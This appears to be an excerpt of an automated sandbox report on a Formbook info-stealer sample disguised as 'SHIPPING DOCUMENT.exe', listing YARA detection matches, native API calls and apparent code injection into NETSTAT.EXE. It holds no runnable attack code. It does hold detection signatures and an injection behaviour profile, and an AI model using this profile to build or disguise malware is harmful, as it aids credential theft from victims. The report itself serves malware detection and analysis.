          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: SHIPPING DOCUMENT.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: SHIPPING DOCUMENT.exe
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E0A NtReadFile,1_2_00419E0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B098F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B09860
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,1_2_00B09840
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,1_2_00B099A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B09910
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,1_2_00B09A20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B09A00
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,1_2_00B09A50
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095D0 NtClose,LdrInitializeThunk,1_2_00B095D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,1_2_00B09540
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B096E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B09660
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B097A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B09780
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B09710
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098A0 NtWriteVirtualMemory,1_2_00B098A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09820 NtEnumerateKey,1_2_00B09820
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0B040 NtSuspendThread,1_2_00B0B040
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099D0 NtCreateProcessEx,1_2_00B099D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09950 NtQueueApcThread,1_2_00B09950
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A80 NtOpenDirectoryObject,1_2_00B09A80
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A10 NtQuerySection,1_2_00B09A10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A3B0 NtGetContextThread,1_2_00B0A3B0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09B00 NtSetValueKey,1_2_00B09B00
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095F0 NtQueryInformationFile,1_2_00B095F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0AD30 NtSetContextThread,1_2_00B0AD30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09520 NtWaitForSingleObject,1_2_00B09520
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09560 NtWriteFile,1_2_00B09560
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096D0 NtCreateKey,1_2_00B096D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09610 NtEnumerateValueKey,1_2_00B09610
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09670 NtQueryInformationProcess,1_2_00B09670
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09650 NtQueryValueKey,1_2_00B09650
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09FE0 NtCreateMutant,1_2_00B09FE0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09730 NtQueryVirtualMemory,1_2_00B09730
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A710 NtOpenProcessToken,1_2_00B0A710
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09770 NtSetInformationFile,1_2_00B09770
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A770 NtOpenThread,1_2_00B0A770
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09760 NtOpenProcess,1_2_00B09760
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909780 NtMapViewOfSection,LdrInitializeThunk,8_2_03909780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909FE0 NtCreateMutant,LdrInitializeThunk,8_2_03909FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909710 NtQueryInformationToken,LdrInitializeThunk,8_2_03909710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096D0 NtCreateKey,LdrInitializeThunk,8_2_039096D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_039096E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909650 NtQueryValueKey,LdrInitializeThunk,8_2_03909650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A50 NtCreateFile,LdrInitializeThunk,8_2_03909A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03909660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099A0 NtCreateSection,LdrInitializeThunk,8_2_039099A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095D0 NtClose,LdrInitializeThunk,8_2_039095D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03909910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909540 NtReadFile,LdrInitializeThunk,8_2_03909540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909840 NtDelayExecution,LdrInitializeThunk,8_2_03909840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03909860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A3B0 NtGetContextThread,8_2_0390A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039097A0 NtUnmapViewOfSection,8_2_039097A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A710 NtOpenProcessToken,8_2_0390A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909B00 NtSetValueKey,8_2_03909B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909730 NtQueryVirtualMemory,8_2_03909730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909770 NtSetInformationFile,8_2_03909770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A770 NtOpenThread,8_2_0390A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909760 NtOpenProcess,8_2_03909760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A80 NtOpenDirectoryObject,8_2_03909A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909610 NtEnumerateValueKey,8_2_03909610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A10 NtQuerySection,8_2_03909A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A00 NtProtectVirtualMemory,8_2_03909A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A20 NtResumeThread,8_2_03909A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909670 NtQueryInformationProcess,8_2_03909670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099D0 NtCreateProcessEx,8_2_039099D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095F0 NtQueryInformationFile,8_2_039095F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390AD30 NtSetContextThread,8_2_0390AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909520 NtWaitForSingleObject,8_2_03909520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909950 NtQueueApcThread,8_2_03909950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909560 NtWriteFile,8_2_03909560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098A0 NtWriteVirtualMemory,8_2_039098A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098F0 NtReadVirtualMemory,8_2_039098F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909820 NtEnumerateKey,8_2_03909820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390B040 NtSuspendThread,8_2_0390B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E90 NtClose,8_2_02DD9E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E10 NtReadFile,8_2_02DD9E10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F40 NtAllocateVirtualMemory,8_2_02DD9F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D60 NtCreateFile,8_2_02DD9D60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E8A NtClose,8_2_02DD9E8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E0A NtReadFile,8_2_02DD9E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F3A NtAllocateVirtualMemory,8_2_02DD9F3A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D5A NtCreateFile,8_2_02DD9D5A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004069250_2_00406925
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041E1FC1_2_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D2601_2_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DA2A1_2_0041DA2A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041BDC41_2_0041BDC4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D6DF1_2_0041D6DF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DFA31_2_0041DFA3
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A01_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B920A81_2_00B920A8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB0901_2_00ADB090
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B810021_2_00B81002
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE41201_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACF9001_2_00ACF900
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B922AE1_2_00B922AE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFEBB01_2_00AFEBB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8DBD21_2_00B8DBD2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92B281_2_00B92B28
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD841F1_2_00AD841F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF25811_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E01_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC0D201_2_00AC0D20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92D071_2_00B92D07
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91D551_2_00B91D55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92EF71_2_00B92EF7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE6E301_2_00AE6E30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91FF11_2_00B91FF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041E1FC1_1_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041D2601_1_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041DA2A1_1_0041DA2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FEBB08_2_038FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398DBD28_2_0398DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991FF18_2_03991FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992B288_2_03992B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039922AE8_2_039922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992EF78_2_03992EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E6E308_2_038E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F25818_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E08_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF9008_2_038CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992D078_2_03992D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C0D208_2_038C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E41208_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991D558_2_03991D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DB0908_2_038DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A08_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039920A88_2_039920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D841F8_2_038D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039810028_2_03981002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDE1FC8_2_02DDE1FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E408_2_02DC9E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E3C8_2_02DC9E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2FB08_2_02DC2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDDFA38_2_02DDDFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDBDC48_2_02DDBDC4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2D908_2_02DC2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 038CB150 appears 35 times
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: String function: 00ACB150 appears 35 times
          Source: SHIPPING DOCUMENT.exe, 00000000.00000003.653383612.000000000338F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700777505.0000000000D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY